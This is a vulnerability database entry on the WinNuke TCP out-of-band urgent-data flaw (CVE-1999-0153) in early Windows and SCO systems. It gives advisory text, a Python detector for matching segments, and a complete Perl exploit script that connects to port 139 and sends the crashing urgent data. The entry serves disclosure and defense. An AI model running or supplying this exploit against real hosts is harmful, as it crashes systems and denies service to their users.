Early Windows TCP/IP OOB (Out-of-Band) Urgent Data Denial-of-Service Vulnerability

Vulnerability ID 1105293 Vulnerability Type Unknown
Published 1997-05-07 Updated 2005-05-02
CVE ID CVE-1999-0153 CNNVD-ID CNNVD-199707-008
Platform Windows CVSS Score 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/20439
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-008
|Vulnerability Details
The TCP/IP protocol stack, implemented by most operating systems, is the most widely used set of protocols for connecting to the Internet. Some older Windows versions do not handle TCP urgent data correctly; a remote attacker can exploit this to mount a denial-of-service attack against a server and crash the host. On 7 May 1997 someone published winnuke.c. It first establishes a TCP connection to a Win95/NT host and then sends TCP urgent data, which crashes the system. 139/TCP is the port most commonly listening on Win95/NT systems, so winnuke.c uses that port. The attack is called an OOB attack because of the MSG_OOB flag; strictly speaking it is a TCP urgent-data attack. <*Links: http://xforce.iss.net/static/173.php http://www.ciac.org/ciac/bulletins/h-57.shtml*>
|Exploit
source: http://www.securityfocus.com/bid/2010/info
  
Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.
  
According to Microsoft, "A sender specifies 'Out of Band' data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow."
  
As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.
  
Windows port 139 (NetBIOS) is most susceptible to this attack, although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning.
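A defender-side check for the condition Microsoft describes above (URG set, urgent pointer at the end of the payload, no normal data following), written as an added Python example that is not part of the original advisory or of winnuke. The TCP segments it inspects are constructed inline, and the +1 tolerance for BSD-style urgent pointers is my assumption.

```python
import struct

URG = 0x20  # URG bit in the TCP flags field


def parse_tcp(segment: bytes) -> dict:
    """Parse a TCP segment (header + payload, no IP header) into the fields we need."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, win, csum, urg_ptr = struct.unpack(
        "!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4          # header length incl. options
    return {"sport": sport, "dport": dport, "urg": bool(off_flags & URG),
            "urg_ptr": urg_ptr, "payload": segment[data_offset:]}


def is_winnuke_like(segment: bytes) -> bool:
    """True when URG is set and the urgent pointer reaches the end of the payload,
    i.e. the segment carries urgent data but no normal data follows it.
    Assumption: accept both RFC 793 (pointer = first byte after urgent data) and
    BSD-style (pointer = last urgent byte) offsets, hence the +1."""
    t = parse_tcp(segment)
    n = len(t["payload"])
    return t["urg"] and n > 0 and t["urg_ptr"] + 1 >= n


def build_tcp(dport: int, payload: bytes, urg: bool, urg_ptr: int) -> bytes:
    """Constructed sample segment (no options, checksum left zero) for offline testing."""
    flags = 0x18 | (URG if urg else 0)           # PSH|ACK, optionally URG
    hdr = struct.pack("!HHIIHHHH", 40000, dport, 1, 1, (5 << 12) | flags,
                      65535, 0, urg_ptr)
    return hdr + payload


def flag_segments(segments: list) -> list:
    """Return indices of segments matching the WinNuke pattern."""
    return [i for i, s in enumerate(segments) if is_winnuke_like(s)]


if __name__ == "__main__":
    # Constructed traffic sample: one WinNuke-style segment, one normal segment,
    # one legitimate urgent segment that is followed by normal data.
    sample = [
        build_tcp(139, b"Sucker", True, 6),    # all six bytes urgent, nothing follows
        build_tcp(139, b"hello", False, 0),    # ordinary data
        build_tcp(139, b"ABCDEF", True, 2),    # urgent "AB", normal data follows
    ]
    print("suspicious segment indices:", flag_segments(sample))  # [0]
```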

#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict;
use warnings;
use Socket;

my ($h, $p, $in_addr, $proto, $addr);

# Target host from the first argument; port from the second, defaulting to 139 (NetBIOS)
$h = $ARGV[0];
$p = $ARGV[1] || 139;
die "A hostname must be provided. Ex: www.microsoft.com\n" unless $h;

# Resolve the host and build the socket address
$in_addr = (gethostbyname($h))[4] or die "Cannot resolve $h\n";
$addr    = sockaddr_in($p, $in_addr);
$proto   = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

# Connect and make the socket unbuffered
connect(S, $addr) or die $!;
select S; $| = 1; select STDOUT;

# Send a short payload flagged as urgent (MSG_OOB); the receiver sees only
# urgent data with no normal data following, which is the triggering condition
print "Nuking: $h:$p\n";
send(S, "Sucker", MSG_OOB) or die $!;
print "Nuked!\n";
close S;
|References

Source: OSVDB
Name: 1666
Link: http://www.osvdb.org/1666